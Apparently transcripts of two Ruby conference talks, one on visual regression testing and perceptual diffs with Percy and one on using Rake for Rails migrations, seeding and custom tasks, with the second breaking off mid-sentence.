Here's just pdiff art. 
I found this in some diffs that I've done, and an image got shifted over just perfectly to create this nice pdiff art. Totally useless, but kind of cool. And also a pretty strong signal in pdiffs is if there are zero pixels changed, that's really important for you, right? Like in a classic refactor of your app, in a pure refactor, you're not changing anything that somebody's interacting with. All the plumbing's shifting around, you're changing architectures, you're upgrading something, but the actual thing that people are touching or the API that you're touching is not actually changing, right? So having a zero-pixel-change pdiff can be a really strong signal because you get visibility into knowing that nothing has changed in this page, right? I can safely upgrade this thing because everything is remaining the same. And as your app gets bigger and bigger, you want to be able to do those kinds of refactors for your code health, right? So let's go write a visual regression testing system in two minutes. Ready, go. Okay. So I have this app, this is Giffindor, which is if you went to Brandon Hays' talk at RailsConf two years ago, this is his app. And Brandon, I don't know if you're in the room, but you probably didn't expect anyone to go back and write tests for your demo app from two years ago, but we're going to do it. So here we go. So here are some, like, feature specs that are written for this app. And they do simple things like you visit a page, you expect that it has some content, you click a dialog, you expect that the new thing is up. This app has just basic behaviors. It's just a stream of posts, right? And you can upload GIFs. And you can do simple things like you click submit a GIF and it does a jQuery animation that pulls that down. And you can type stuff and there's a validation state, like a bunch of things that we all do all the time, right? So these tests for this are relatively straightforward. So let's just go save a screenshot at the end of this. All I'm doing here is using the Capybara save_screenshot capabilities, and this works with basically every web driver that you have except for rack-test, but most web drivers support this. So let's save that and let's go run the tests. R is just my bash alias for bundle exec rspec. So don't let that throw you. And you should all have that, by the way, because you type that all the time. So great, we've run the tests. Let's see. There's a change here, right? So we have a screenshot of what our test looked like in that state, or what our app looked like in that test state, right? And this is kind of what I call a complex UI state, right? You've clicked a button and some jQuery animation is fired in order to open up that top dialog. This is not just a static page that you visited, right? But you'll also notice it doesn't quite look exactly like the page we were looking at, right? This border image is all messed up and there's some other things going on here. So we'll talk a little bit about that later, like why that's actually not totally the same. Okay, so great. So we've saved our old image. Let's change it to new for the new one. And let's go change the background color of this app. So here's the CSS. Let's just change the background color by one pixel, right? And we'll make sure that this other one is saved. We'll go run our tests. Great. So we have an old and a new. Great. Let's compare them. And store it in diff.png. Open up diff.png. Cool. Here's a pdiff, right? 
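[Editor's note: a rough reconstruction of that two-minute demo loop, with made-up paths. The feature spec ends with Capybara's `page.save_screenshot(...)`, and a tiny script then shells out to ImageMagick's `compare`, whose AE metric reports the number of differing pixels on stderr. This is a sketch, not the exact script used on stage.]

```ruby
require "open3"

# The feature spec ended with something like:
#   page.save_screenshot("tmp/new.png")
# and the previous known-good run saved tmp/old.png.
old_png, new_png, diff_png = "tmp/old.png", "tmp/new.png", "tmp/diff.png"

# `compare -metric AE` writes the count of differing pixels to stderr;
# `-fuzz 1%` ignores tiny per-pixel color differences.
_stdout, pixel_count, _status = Open3.capture3(
  "compare", "-fuzz", "1%", "-metric", "AE", old_png, new_png, diff_png
)

changed = pixel_count.strip.to_f
puts changed.zero? ? "No visual change" : "#{changed.to_i} pixels changed, see #{diff_png}"
```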
Like all the background pixels of this page have changed. And you might think of this as just noise, right? But why would anybody care about a background color that you can't see? But I guarantee you that there's a designer in this room who actually would probably want to know if this changes, right? And they want to guarantee that there's a consistent color palette being used and that we developers aren't sort of arbitrarily changing the background shades when we think that that's a new color that we should use, right? There needs to be some consistency there. So I kind of don't discount these kinds of changes just because you can't see them at the eye. That doesn't mean that they're not important. So great, right? Awesome. Let's all do this. So simple uses here are catching visual regressions, right? That's the kind of obvious one. But then if you start thinking about this more, there's a lot of advanced uses for this kind of stuff. Like CSS refactors and deletions is a big one, right? You're all terrified to delete CSS. Yes or no, right? Because it's scary. You don't know where that CSS is used. You don't know what legacy parts of your app are using that CSS. So what if you go add a visual diff test to a visual regression test to your top 50 pages, now go to delete your CSS and see what happens, right? And if you've deleted it and nothing changes on the pages you care about, great. You can probably delete that CSS. Testing style guides, especially testing living style guides is a pretty cool use of this. Safe dependency upgrades. So often your libraries, you know, they're backwards compatible, but they're adding new features. So you want to be able to upgrade your libraries. But upgrading libraries and dependencies is also kind of scary sometimes. And you want to be able to, especially if those libraries are providing front-end dependencies of any sort, if they're providing JavaScript behaviors, if they're providing, if your style guide is in its own gem and you're importing that and you're upgrading style guide versions, like upgrading dependencies safely and having these kinds of visual checks can be really useful. Visual regression testing for emails is an awesome advance use case I've seen. Testing D3 visualization is something I've sort of started experimenting with recently. Because testing D3 is actually kind of hard, right? Like you can kind of test, I'm not like a D3 expert by any means, but you can sort of test like the data transformations you're making, like how your inputs transform your outputs and sort of how you expect the D3 is going to be able to visualize that. But wouldn't it be nice to just be able to be like, this is what it looks like. I know that that's right. Oh, look, it's changed. Is it still right? You know, that's kind of what you really want to test with those visualizations. And then going further, what I really want here is a visual review process alongside code review. And we're going to talk a little bit more about that. So if this was all so easy, why aren't we all doing this right now? Right? And definitely somebody has said that if it wasn't easy, or if it was easy, it wouldn't be hard. This is, it gets really complicated, right? There's a bunch of problems. And I'm going to sort of hand wave over a bunch of the problems. But I sort of bucket them in three different categories. Tooling and workflows, performance, and non-deterministic rendering. So on the tooling front, it's kind of hard, right? 
There are some open source projects that do this right now. Phantom CSS is a great example of one, right? But it sort of presents all of your visual changes as a ton of individual test failures, right? And that's kind of a lot of information and a lot of failures for things that are, it just sort of, it confuses the line between like something being flaky and, or a change that you want it to be and like an actual test failure, right? Or for example, you probably shouldn't have to require that you're manually storing these baseline images like in your Git repo, right? Like that's a big workflow tooling process that most of us are probably just not going to do. It's going to work, right? The performance one, I think this is the big one across the spectrum of all the open source tools, all the proprietary tools, all the everything. This is the big one that probably prevents us from doing this right now. The examples I showed are somewhat contrived, right? They're pretty simple pages. But in the real world, you know, I have some pages that are, when you render a full page screenshot of them, they're 30,000 pixels high, 40,000 pixels high, and that's not crazy, right? So rendering and screenshotting, that kind of page and uploading it, storing it can take 15 seconds just to render it and another five to diff it. So if you have a hundred of these tests that you want to do, and they're all run serially, that's 30 minutes you're adding to your test suite, right? And none of us want to do that. Your feature specs, if you're writing feature specs already, they're already too slow, right? And they're already too flaky. So that's a hard one. And I think the performance is actually the biggest problem here. And then non-deterministic rendering, which we'll talk about. So I'm sort of hand waving over the other problems. If you want to talk about this more, I would love to. So on the non-deterministic rendering front, simply, like, there's a bunch of things that change in browsers, right? We're not just doing static pages. So animations is the big obvious one, right? So take this, like, pure CSS animation, right? If you visually diff this a bunch of times, what diff are you going to get? You know, you might get this diff. You might get this diff. You might get this diff, right? These aren't useful to you. They're just kind of noise. So for example, in Percy, what we do to do this is we actually freeze animations by injecting this particular CSS style into the page that tries to stop all of these animations from happening so you can just say nothing has changed, right? And if you want to know more about that, I have a post on blog.percy.io about how we actually do that. Or another one. Dynamic data is a big problem, right? If you have anything on your page that changes in your tests, especially, you're going to see a visual diff from those. So like a date picker is a good example, right? And you can sort of fix these with like fixture data instead of faker data. You can sort of like move in a direction where you're having more like static deterministic things that you're using in tests, which I think is a relatively good fix. But this is still a big problem. I have some ideas about how to address this kind of thing. So old test browsers. So like we talked about before, what you see on the right here is what was rendered by Capybara WebKit. And what you see on the left is like what's rendered by Firefox, right? And these are not the same thing. 
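[Editor's note: going back to the animation point for a second. Percy's actual approach is written up on blog.percy.io; purely to illustrate the general idea, a test helper could inject a style tag that switches off transitions and animations before a screenshot or snapshot is taken. The CSS rules and helper name below are assumptions, not Percy's code.]

```ruby
require "json"

# Disable CSS transitions and animations on every element so repeated renders
# of the same page produce the same pixels.
FREEZE_ANIMATIONS_CSS = <<~CSS.freeze
  *, *::before, *::after {
    transition: none !important;
    animation: none !important;
  }
CSS

def freeze_animations!(page)
  page.execute_script(<<~JS)
    var style = document.createElement('style');
    style.appendChild(document.createTextNode(#{FREEZE_ANIMATIONS_CSS.to_json}));
    document.head.appendChild(style);
  JS
end

# Usage inside a Capybara feature spec, before capturing the page:
#   freeze_animations!(page)
#   page.save_screenshot("tmp/home.png")
```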
There's like not the border image doesn't work and the like, you know, the web font here is not a web font on this one. And the problem with this is that often the browsers, the old test browsers that we're using underneath are not really modern in any fashion, right? Like Capybara WebKit is an old fork of WebKit that doesn't support these things. If you phantom.js all the way up until the new like 2.0 version didn't, doesn't support these things too. It was a fork of Chrome 14 from five years ago, right? It doesn't render the modern web. It also has 1700 open GitHub issues that are like basically untree-aged. So go for it. So that's a really hard problem, right? And then some other problems like you can't really control for is this sort of like sub-pixel anti-aliasing problems. The way that text is represented on a page is not totally deterministic, right? These things might shift by one pixel. GPUs don't actually guarantee in some way is that like floating point operations will always come out to be the same thing, right? So if you have a gradient that's rendered on one machine and you try to render that same gradient on another machine, they may not be pixel perfect. They probably won't be. If you compile some code with different optimization flags, GPU floating point operations will be non-deterministic, right? So we look at pages as if they are the same all the time, but actually getting them to be pixel perfect is a big problem. Some tools attempt to solve this with some sort of like open CV computer vision researchy things where you try to say like, oh, is this a button, has the button moved and you sort of try to derive the page back from the image, right? So that's hard. So PDIFs are only half the battle here, right? So back to our main goal, like what if we could see every pixel changed in any UI state in every PR, right? And this is really what I think is the difference between like visual regression testing sometimes and what I frame as continuous visual integration, right? In the same way that like your unit tests are not the entire thing you're doing to test your system and you need processes to like be doing continuous integration, you need to be merging changes with all of your other developers all the time, you need to be testing them instantly in CI as fast and as parallelization, you know, as parallelized as possible. There's a difference between like doing visual regression testing sometimes and continuous visual integration and these are sort of the big problem spaces that create that. So that would require, being able to do this would require that things are really fast, right? There's basically as fast as your test suite. You need to be able to handle complex UI states. You can't just test a static page. We're not just here to just like look at all of our static pages. We need to be able to test components and all the different components states. And it needs to be continuously integrated into your workflow on basically every commit, right? In my mind, this can't be saved until you're either in production and even staging is like a little bit too late for me, right? Like I want this to happen basically all the time. So I'm going to talk a little bit in the last part of this talk about how we sort of architected Percy to try to address these problems. So here's like, here's how Percy integrates into like an RSpec feature spec. It's basically the same thing that we created, right? You have a feature spec, visit some page, it does some action on the page. 
And then what you do is you just drop in, you know, Percy::Capybara, snapshot the page, give it a name, say this is the home page, right? So what's that actually doing underneath, right? When these things get pushed up to Percy, are we pushing up images? And I say that with question marks because those would come along with all the problems that we noticed before, right? So we don't want to do that. So what we actually do here is we push up DOM snapshots. And if you think about this, it makes a lot of sense, because the most efficient, the most lossless encoding format for a website is not an image of the website or a video of the website — it's the website, right? It's your assets, it's your DOM state that you've created. So we actually push up the DOM and HTML snapshots, and technically push up SHA-256 fingerprinted versions of those assets so we actually never upload things twice. So the first run might be slow, but then after that, my goal is basically to say, you know, zero time is spent in your test suite after the first run — but it's not totally true. So then we do a bunch of hand-wavy magic underneath that: we push that stuff into storage, we can talk to GitHub and commit statuses, we can coordinate work with this Percy Hub, and — this is the big part that actually addresses most of the performance issues — we can parallelize this, right? So you've pushed us up a bunch of DOM snapshots as fast as your test suite can go, and what we actually do underneath is we run them as fast as your concurrency limit allows. So we can actually, totally out of band of your test suite, be parallelizing and running and rendering these DOM snapshots in a deterministic rendering environment and then be able to show those to you in a nice way. So this was the main innovation that helps, I think, this thing come to fruition. So as of yesterday, actually, I wanted to talk about this: we have hit a million visual diffs rendered in Percy as of yesterday, so I was really proud of that milestone. So here's a couple of quick Percy examples. I talked to some of our customers and got permission to show you just a couple of pages. Just to see what Percy the product looks like and how I've sort of been trying to address this problem. So here's charity: water's build, charitywater.org. They have an amazing design team and a big Rails app, and they push 162 total snapshots on every build, basically, and this particular build, which is called "footer," updating the new footer markup, had 96 visual diffs, right? And you can sort of go through each one of these pages and just be like, oh look, look at all these footer changes, and then this is the diff, and I can click that and say, oh great, so I noticed that this footer is different on all of these pages — and this is a lot to go through, right? So I just recently added this overview mode where I can just see all of my pages all at once and be like, okay, and just confirm, really quickly do a visual review and just confirm that all of these changes are the ones that I want, right? These are the visual changes that we actually want to make as part of this PR. So here's another example. So this page is basically, we're updating — the PR is "new press page" and we're trying to update our new press page, right?
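To make that integration point concrete, here's a sketch of the RSpec feature spec usage described above; the Percy::Capybara snapshot-with-a-name call is the one the talk describes, while the exact keyword syntax, the page, the link, and the spec name are my own placeholders:

    # spec/features/homepage_spec.rb (hypothetical spec)
    require 'rails_helper'

    RSpec.feature "Homepage", type: :feature do
      scenario "renders the marketing page" do
        visit "/"
        click_link "Learn more"   # placeholder interaction to reach a UI state
        # Pushes a DOM snapshot (not a screenshot) up to Percy for rendering and diffing
        Percy::Capybara.snapshot(page, name: "homepage - learn more")
      end
    end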
And this one is just the first iteration of that PR where they remove some CSS styles and like, oh look, this page is totally broken, right? And they would never want to launch this page but it gives them this sort of iterative review process where they can go here and they can say, oh look, this is what our page looks like currently in this PR and then also the important signal of none of the other pages have changed, have changed based on this CSS change, right? And then you can go through and you can sort of see like, what are the other pages here in this app? So on the workflow and tooling problem, so this is the last thing I'll show you. So we just provide this as like a CI service, right? We just like, as your tests run, they actually push information up to Percy and then Percy marks this PR with another CI service right here. Percy, VisualDiff's found, right, and we can just click details, jump right to the page and be like, oh look, this is the state of this PR, right? This is that background change that we made. And I can go through and I can decide like, yes, this is the right visual change that was intentional for this PR, let's go ahead and mark it. So I'll do a little, this is the one HTTP request that my demo or that my talk requires, so let's hope that this works. So okay, so like I go here and I'm like, great, this is, I'm doing a visual review right from GitHub. I'm going to do things, this is what I want, click approve, and then GitHub will, you know, mark that status as green, right? So now this sort of gives you like a lightweight visual review process for all of the different UI states of your app and at the PR level, right, not like at some later stage. So yeah, that's basically what this DOM snap shutting mechanism has helped us sort of like tackle a bunch of those different problems. So that's it. I just want you to take away from this talk that like visual testing is possible. It's a thing. We should be doing it. It's a new way to think about testing and it can help give you deployment confidence, right? I think of this as like the last stage of the CD pipeline where you just need to like in your acceptance phase, you need to make sure that all of this stuff is looking correct, right? And you need to be able to approve it. And that this is still a very manual step, but we can probably automate quite a bit of this. And then also there's like a lot more work to be done to make this a mainstream engineering practice. One last thing. So because of this DOM snap shutting model, I'm able to, I just want to give you a sneak peek of something I'm working on over the next couple of months. I want to be able to do this for Ember regression tests or for Ember tests. So if you are an Ember user, I would love to talk to you. Just email me micatpercy.io and let's talk about like getting you as a beta tester of this in Ember test. Because I actually think that this is probably the world where this makes the most sense, right? Like not everyone is writing Rails regression tests or Rails feature specs in a lot of ways because they're really hard to write sometimes. But we are writing a lot of JavaScript tests nowadays, right? And as we sort of further separate our worlds to like this is just an API back in and this is like a single page app front end and those lines become clearer and clearer, we're going to have a lot more of these tests. And so to be able to get this kind of power all we need to do is be able to send up those DOM snapshots and render them. 
So if you're interested in that, please let me know and I can like I'd love to get your hands on the beta. So thanks so much. Yeah, the question is like what is the baseline? How is the baseline created? So basically I think you can do that a bunch of different ways. I usually just pick like master. Whatever master has last created, that is our baseline, right? And then we provide a mechanism in Percy where you can say like I want a more manual version where I actually approve a master build and that becomes the baseline. So I think you've got to have kind of both. But yeah, basically I think if you're really doing like master is always green and always deployable then you should always be testing against master. Yeah, so we don't right now, right? I think the question was do you do cross browser testing? So I think that that would be a great evolution of this kind of testing, right, is doing more cross browser testing. But it comes with all those problems I mentioned too and you'd be surprised to learn that most browsers don't provide a full page screenshot API and Firefox is the main one. So I think that you can get like 90% of the benefits of visual testing with like one good modern browser. But then that would be a great evolution of this kind of idea would be to do cross browser testing. Yeah, that's a good question. The question is like what tech stack are we using? It's all custom built on Google Cloud Platform. I've like dockerized all of the environments. It's basically a Rails API, a full strictly Ember front end and the workers like run XVFB which is a virtual frame buffer. It's all on Linux. It runs Firefox. Yeah, it's running Firefox. Yeah, it's running Firefox. Yeah. Oh, so you're asking about Percy access control. Who can access that Percy page? Right now I just tie it to like GitHub auth. So if you can see the repo in GitHub, if you have access like team collaborator access of the GitHub repo, you can see it in Percy. And anybody who can see that can hit approve. Yeah, I haven't built any like complex like role authentication kind of things yet. So yeah, I totally missed that part. So let me just do that quickly for the people who remain. Okay, so part of this thing is we have all of these different like screenshots at a particular width, right? But we have the original DOM of these. So we can just resize the browser to a smaller width and actually show it. So here's like responsive testing. So here they have a 320 PX version of this. So now I can see the footer change in all of those different ones, right? And I can like full width this and like this is what this page looks like, you know, quote on mobile basically just like at this, at this breakpoint size, right? So the DOM snapshotting model also takes care of that in that you can just like render it a different width. This is not testing on the actual device, right? But it is like, you know, giving you at least the responsive side of it. The question was, can you disable the local test run and only have it on CI? That's actually the default behavior. And then I've had some people ask like, I want to disable it for only specifically this branch. So there's an environment variable we provide called Percy enable which you can set to zero or one and it will force that environment to be on or off. Cool. Thanks so much. Thank you. Thank you.
|
Unit testing is mostly a solved problem, but how do you write tests for the visual side of your app—the part that your users actually see and interact with? How do you stop visual bugs from reaching your users? We will dive deep into visual regression testing, a fast-growing technique for testing apps pixel-by-pixel. We will integrate perceptual diffs in Rails feature specs, and learn how to visually test even complex UI states. We will show tools and techniques for continuous visual integration on every commit, and learn how to introduce team visual reviews right alongside code reviews.
|
10.5446/31506 (DOI)
|
Alright. Thank you all for coming after lunch. I know there's lots of good choices. It's hard. So many tracks and workshops going at the same time. And so I appreciate y'all being here. It's good to see so many seats taken. I'm Barrett Clark. I've done Ruby for about a decade. I like to run. I currently work at Sabre Labs, where I do research and build prototypes really to try to make travel suck less. Sabre is a travel company. And I like to be outside as much as possible. But we're not here to talk about me. Today we're here to talk about rake. So let's get started. Rake is a Ruby scripting utility really used to streamline tasks, repetitive tedious tasks. It can be considered a Ruby version of make, the Unix build automation tool. Similar to make, we have a Rakefile like the makefile. But the Rakefile is written in Ruby. So you can do all these things in Ruby. It was created by Jim Weirich, who unfortunately passed away in February of 2014. And I still miss him. I miss his spirit. I miss his influence. His energy. This was one of his last tweets. There was a new TV show called Rake. But it was confusing because it wasn't about Ruby or build automation, which is unfortunate because maybe it could have been a good show. Okay. Rake can help us manage our databases. If you've done any Rails, then you've probably used database migrations and you've used rake. And I would say really this is probably the biggest killer feature in Rails, database migrations. So here we have a migration from the Rails 5 beta. So of course we're going to make a blog. We've got our timestamps created. We'll have two fields, a title and a body. Wouldn't it be great if all blogs were short? These are just strings. So we want to create our table. To do that, we'll use bundle exec rake db migrate. You'll note the inclusion there of bundle exec. Rake is a Ruby scripting utility, so you could just run rake. But we're in a Rails app and we want this to work in the context of our Rails app's Gemfile, and Bundler can help us with that. And so, bundle exec rake db migrate. So we run it and you see I'm going to run the create posts migration and it's going to create a table, posts, and we're good. Oh, but I changed my mind. Maybe you're indecisive like me and you change fields, change the names, add fields. You don't really know where this is going quite yet. So I want to add a permalink to my table because we want to tweet about all the pithy things we have to say. We want people to come find our blog. So we could create a new migration, which is reasonable, but we can also edit our existing migration. And I'll talk here in a minute about why and when we make those choices. But let's just say that it's totally okay and we're going to just put this new field in there. So there's a couple of ways that we can revert this thing and rerun it. The first, we can just use db rollback: bundle exec rake db rollback. And so that's just going to reverse the migration. Active Record understands how to undo lots of the things that it does. Create table is one of the things that it knows how to undo. If it's not something that is a reversible migration, you have to write up and down separately, and so then it would run the down method. So we do that, bundle exec rake db rollback, and we say, okay, we've got this create posts migration that we're going to revert, so we're going to drop the table. And dropping a table deletes the table, and when you delete a table, you delete all of its data also.
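As a concrete sketch, the migration being discussed ends up looking roughly like this once the permalink is edited in — the column names come from the talk, while the file name, the column types, and the Rails 5 migration superclass syntax are my assumptions:

    # db/migrate/20160504000000_create_posts.rb (timestamp is a placeholder)
    class CreatePosts < ActiveRecord::Migration[5.0]
      def change
        create_table :posts do |t|
          t.string :title
          t.string :body       # just a string -- wouldn't it be great if all blogs were short?
          t.string :permalink  # the field edited into the existing migration

          t.timestamps
        end
      end
    end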
But that's okay, this is development, right? You wouldn't do this in production. The other thing we can do is bundle exec rake db migrate redo. And this is great. It'll roll it back and then roll it forward again. So you can see we're going to take that create post migration, we'll drop the table, and then we'll create the table. So we're going to delete the data, we're going to delete the table, it's going to delete all the data, and it's going to recreate the table. So when it does it, you'll have a fresh table that has all the stuff in it except for the data. This is super handy. I use this a lot. Oh, change my mind again. We've got this blog post, we've got the permalink, and it's going to go viral because, I mean, we have incredible stuff to say, right? So we're going to add an index to the posts table on the permalink so that we don't table scan every time we look up that field because table scanning is bad, right? But we've introduced a new database object. And so when we try to roll it back, Active Record is going to say, okay, well, I need to undo all the things that I did. So I'm going to drop the index and then I'm going to drop the table. Now, of course, if you drop the table, it would drop all of its objects if you just did it in the database, but Active Record is going to be thorough. And so it's going to explicitly drop everything that is created. And we're going to have a bad time. Don't worry, that guy survives. He's fine. So we need a different strategy. We're going to drop the database and recreate it, then re migrate bundle exec rake, db drop, db create, db migrate. And you can see we can run multiple tasks serially one after another. And yes, this is heavy handed. This is totally scorched earth here. But again, we're in development. We're doing early development. We just created this table. We don't really know where we're going yet. And so it's okay. So you're asking, Barrett, when can I change? Can I just change the migration and re run it? And of course the answer in computer science is always, it depends. So limitations, new fields are totally fine. You don't have any new database objects. And so you can rerun that new objects. So a new index of foreign key or for whatever reason, you wanted to create a second table in that migration. That's when you'd have to drop the database and start over again. And if you've already committed and pushed, don't change it. That's a bad thing. So I'll tweak a migration and rerun it when I'm in initial development. And I'm still trying to figure out what I'm doing. But once I've set that stake in the ground, then it's fixed. And we're going to have to create new migrations. But I don't want to create 10 migrations while I'm trying to figure out, you know, what needs to be in this table. So let's keep going with rake and database management. And we're going to talk about advanced database seeding. When you create a new Rails app, you get a seeds file and it's empty. And it looks like this has these comments. And it tells you, I've got these tasks that I can run for you, db seed, db setup. And when you run, let's say you run the db seed task, well, it's going to take whatever's in there and run it. So the example here is we're going to create a couple of movies and then we're going to create a movie character. And that's great. But the problem is each time we run this, it's going to rerun everything that's in there. 
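A sketch of what that seeds-file problem looks like, alongside the idempotent first_or_create form the talk turns to next; the Movie and Character model names and titles are just stand-ins for the talk's example:

    # db/seeds.rb -- naive version: every run of rake db:seed creates duplicate rows
    Movie.create(title: "Star Wars")
    Movie.create(title: "The Lord of the Rings")

    # Idempotent version: only creates a record when the where() finds nothing
    star_wars = Movie.where(title: "Star Wars").first_or_create
    Character.where(name: "Han Solo", movie: star_wars).first_or_create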
And Star Wars and The Lord of the Rings, you know, they're trilogies, but we don't need multiple Star Wars movies in the database. So Active Record has our back, though. Instead of create, we can use first_or_create. So where we have this where condition, when that is not satisfied — when it cannot find a record — it'll create it. Otherwise, it'll just return whatever instance or instances it finds. We're using first_or_create, so it'll return the first matching record, or create it if it isn't there. Postgres 9.5 recently shipped and we finally got upsert, which is update-or-insert. So who knows, maybe let's keep our eyes peeled for updates in Active Record to support that. But first_or_create is going to be what you want here, and then you can safely rerun this db seed task. So why not rake all the things all the time? Because we can run multiple tasks serially, one after another. Why not make sure the database is completely up to date every time? We can safely run the db migrate task several times. And if there is nothing to be done, then it just won't do anything. And we can now safely run our seeds task multiple times because if it doesn't have anything it needs to create, it just won't do anything. We can also create a custom rake task. This one's going to take a CSV file and load it in. The CSV file has a header row that happens to match the fields in the table, which is handy. I've got a custom converter there, so any field that is blank, the quote-quote empty string, will be converted to a null that the database understands. So there's a bunch of stuff there, let's go through it piece by piece. We've got a rake task and it's in the db seed namespace. You can nest the namespaces, and so that's how you get db seed, and then the task is import airports. It's going to load the Rails environment. We're going to look and see if there are any airports already loaded. If there are any records, we're going to assume that this task has already been run and we don't have to do anything. We could do first_or_create and that would work just fine, but there are lots of airports, right? That would be a lot of lookups. It's going to create a lot of objects it doesn't need to create and we're going to generate a lot of log and we don't really want that either. So we'll just be naive and assume if there are any airports then we're good. CSV, out of the Ruby standard library, is really handy. So foreach, given a file name, will open the file and read it in line by line, record by record. We've told it that there's a header row, so it'll take that row, and it takes each row and basically makes it a hash. So the field names from the header will be the keys, and then the hash values will be the data from that particular record. And I'm going to convert the keys to symbols just so that they look like what I'm expecting a hash key to look like. I prefer my hash keys to be symbols. The custom converter there — this is also a really handy thing that CSV offers us. So if there is data in that field, if it's not null but it is empty, the empty string quote-quote, then let's make it null; otherwise we'll just return the field value. So that way we get good null values that the database understands instead of a table chock full of just empty strings. Nobody needs that. So we'll pump that hash into Airport create — because the field names are the same as the column headers, you can pump a hash directly into Active Record create and it'll create the records for you. You're good to go.
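Here's a runnable sketch of the import task just described; the Airport model, the blank-to-nil converter, and the task name follow the talk, while the CSV file path is a placeholder of mine:

    # lib/tasks/db_seed.rake (sketch)
    require 'csv'

    namespace :db do
      namespace :seed do
        desc "Import airports from a CSV file with a matching header row"
        task import_airports: :environment do
          # Naive guard: assume the import already ran if any airports exist
          next if Airport.any?

          blank_to_nil = ->(field) { field && field.empty? ? nil : field }

          CSV.foreach("db/data/airports.csv",
                      headers: true,
                      header_converters: :symbol,
                      converters: [blank_to_nil]) do |row|
            # Header names match the table's columns, so the row hash maps straight in
            Airport.create(row.to_hash)
          end
        end
      end
    end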
Again, we could have done first_or_create here, but I don't want to do 8000 lookups, wait for that to happen record by record, and generate all that log. That's just a lot of unnecessary work. So here it is again, a custom rake task to load a CSV file and import it if it needs to be. To invoke that rake task: bundle exec — because we want this to run with the Rails app's Gemfile as context — rake db seed import airports. It's in the db seed namespace so that becomes part of the name. So we've been plugging away, and maybe we did do first_or_create, and so our logs are starting to get out of hand a little bit. So we have too much log. Well, we've got a rake task for that in Rails. So you take a look at your logs directory — and this one's actually not very big, but you can see that the test log is significantly bigger than the development log. You're running your tests a lot. Maybe you've got Guard running, and so every time you save, it reruns your tests, and so it can quickly grow. So bundle exec rake log clear will go through and it'll open up and truncate each file in that log directory. It won't give you any output. It would be nice if it told you what files it's clearing and how much space it saved. It won't do any of that. But Rails is open source so we could hack on it. So I don't know. Come talk to me afterwards if you want. So let's rake all the things. Because we can run multiple tasks serially, why not make sure our database is up to date and our logs are clear every time. So bundle exec rake db migrate db seed log clear. Again, we can safely rerun the migrate task and we can safely rerun the seed task. Rails can also tell us stuff. We can see all the notes that we sprinkled for ourselves throughout our code. Bundle exec rake notes. It'll go through and look at all the TODOs and FIXMEs that you've put in all the files. There's also an OPTIMIZE tag. I haven't actually used that. Maybe I should. So we do that in a test project here that I made, bundle exec rake notes, and we see in that posts model I've got a TODO. As you can see the line number is line two, and then on line three I've got a FIXME that just says this is an example. Fix me. And then in the seeds file I've got a TODO for myself to create some blog posts. So you can see the line number and the file of each of your notable notes. But documentation goes beyond comments. Your app can tell you things about itself. What does it know how to do? How do you use it? That routes file and the routes — that's one of the first places that I look when I pick up a legacy Rails app, or just a Rails app that I didn't write or that I forgot that I wrote. So let's look at a routes file. This is an old one from an old work app. You can see there we've got a couple of GET actions on a gates controller. We've got a readings resource. A resource is probably an API that we've exposed for another app to talk to. And that resource gives us the seven golden actions for free: index, create, new, edit, show, update and destroy. And then we've also defined a root route. So if somebody just goes to, you know, localhost 3000 or myawesomeapp.com, then they'll get something. So bundle exec rake routes: we see all the routes, and we see those two GET actions on the gates controller. We see the seven golden actions for readings and we see our root route. Now, that readings index is actually not going to return anything. It's just a 204, no content. There's no body.
So seeing the routes, the named routes, seeing the URLs that you have in your app is really handy. We didn't specify any custom names in any of our routes, but you could do that. So then in your app you could refer to these routes as gate_manifest_url or gate_manifest_path — I think you can do that. And so you could put that in link_to or redirects, all those things. As your app gets big and you have more routes, you might want to filter. Well, because this is just a command line scripting utility, we can chain commands together. We can pipe the output into another command. And so we'll do bundle exec rake routes, we'll pipe that through grep with the keyword gate, so we can see any route that has that gate keyword anywhere in the line. So we have two gate routes. With a big routes file, this is really handy. Okay. We can also use rake to update our projects. And this is a little bit scary. Bundle exec rake rails update. You run that and it's potentially heavy handed again. So it's going to go through and it's going to look at all the files in your app for your app version, and it will tell you all the new files that it needs to create or any changes in files that you have already. So this is the Rails 4 syntax. Rails 5, they've changed it to bundle exec rake app update. So we run that on one of our apps. And you can see it's going to go through a bunch of files and say, well, we already got that. It wants to create a new secret key. We don't care. It gets to the development environment file. And we see that the Active Job queue name — they want it to be changed. Instead of being camel case, we're going to snake case it. And do we want to accept it? Well, I haven't made any other changes in this file. And so it's safe to accept it. So you can see I say yes. Here are the options that you get. File by file: yes, you can accept; no, you can choose to not accept it. Or you can just step on everything. Or you can see a diff. So what I like to do is get that diff. And if it's a file that I've made changes in, then I'll decide how I want to approach it. Maybe I'll copy in the change or maybe I'll just step on the file and look at a git diff and see what I just stepped on. It's safe to run this and see what needs to be changed without stepping on anything. But you've also got your project under version control. So if you do step on something, you can always revert. So remember, rake is a Ruby scripting utility. So it's not just for Rails. We can do this off the rails. All you have to do is include the rake gem and have a Rakefile. Similarly, we can use Bundler in just a plain old Ruby project. So here's a very simple rake task. Got a description. This task says hello. The task is hello and it's going to puts hello. So we run that, rake hello, and it says hello. It's a very friendly task, right? Well, I add a second task, world, and I put them in a namespace now because they're similar tasks. So a namespace is a way that we can group like tasks together, and it becomes part of the name like you saw before. So rake railsconf hello says hello. Rake railsconf world says world. Got a third task here and this one has some dependencies. And it doesn't have a block. It doesn't have its own body because it doesn't need to do anything in addition. So when you run this phrase task, it's first going to go run the hello task and then it's going to run the world task, and then if it had a body, it would run whatever was in that block. So we run that: rake railsconf phrase.
It's going to run the hello task and say hello. It's going to run the world task and it's going to puts world. Cool. So now we have a fourth task. We're getting tricky here. This task takes in a parameter. It takes an argument. It only has one argument, a name, and in that block it's going to come in as the args hash. Similar to a controller, where you have the params hash, we have the args hash in the rake thing. You could call it whatever you want — you define the variables there for the block — but the idiomatic thing is we call it args. So we're going to say rake railsconf custom hello, Barrett, and it's going to say hello, Barrett. Hi. Here's how we would run it in a Ruby script. You can invoke rake tasks from inside Ruby. All you have to do is require rake, load the Rakefile, and then Rake task, the name of the task, dot invoke — and if the rake task has parameters, they would go in the parentheses there for invoke. This also shows how to use Bundler in a plain old Ruby script. Again, just require bundler, Bundler dot require. We could have had the rake gem defined in the Gemfile and then it would have been required, but I wanted to show it separately. So we run that Ruby script in the context of our Gemfile, bundle exec ruby rake_include.rb, and it says hello, Barrett, because that's what we told it to say. Finally we add a default task there at the very bottom. If you just run rake, it's going to complain because it says, I don't know what to do. I don't have a default task. So we give it a default task. It's on the global namespace for that Rakefile, and so the default task is railsconf hello. So we run rake, it says hello. We can ask our Rakefile, what's so great about you, and 